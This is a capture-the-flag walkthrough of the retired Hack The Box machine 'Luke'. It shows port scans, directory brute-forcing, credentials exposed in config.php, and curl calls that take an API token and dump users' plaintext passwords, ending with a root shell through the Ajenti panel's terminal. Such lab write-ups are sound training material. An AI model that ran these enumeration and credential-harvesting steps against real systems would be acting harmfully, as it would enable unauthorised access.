HTB - Luke
Writeup for the retired HTB machine Luke
Link: https://www.hackthebox.eu/home/machines/profile/190
IP: 10.10.10.137
Recon
A qick portscan reveals multiple open ports:
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh?
3000/tcp open http Node.js Express framework
8000/tcp open http Ajenti http control panel
The FTP holds a note from Derry to Chihiro, which reveals these two usernames.
Dirb scan for main
As there are multiple websites hosted, all of them are checked for subfolders and interesting files:
START_TIME: Sun Sep 1 15:04:07 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/
Dirb scan for 3000:
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
---- Scanning URL: http://10.10.10.137:3000/ ----
+ http://10.10.10.137:3000/login (CODE:200|SIZE:13)
+ http://10.10.10.137:3000/users (CODE:200|SIZE:56)
gobuster for main
As the Dirb scans were not considering file extensions in their called configuration, a correctly configured gobuster scan is conducted as well:
Important: Check for extensions! (-x)
gobuster dir -u http://10.10.10.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
2019/09/01 15:58:46 Starting gobuster
===============================================================
/index.html (Status: 200)
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)
Progress: 163025 / 220561 (73.91%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
This yields http://10.10.10.137/config.php, which reveals credentials:
root:Zk6heYCyv6ZE9Xcg
These creds can be used to log in to :3000/login, but using username root doesn’t work… but admin does.
curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login
The resulting token can be used to enumerate users:
curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE' http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
By enumerating everything on port 3000, one can observe that the endpoint /user/{username} exists. So we can query for every single user:
curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE' http://10.10.10.137:3000/users/admin
which yields:
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
{"name":"Yuri","password":"bet@tester87"}
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
with these, we can try to login to /management and find a config.json. That one holds credentials as well.
root:KpMasng6S5EtTy9Z
With these credentials, one can login to :8000 (Ajenti).
Ajenti provides a comfortable web interface for management - including a Terminal (located under Tools).
Opening that Terminal yields a root shell on the system that can be used to print the root flag.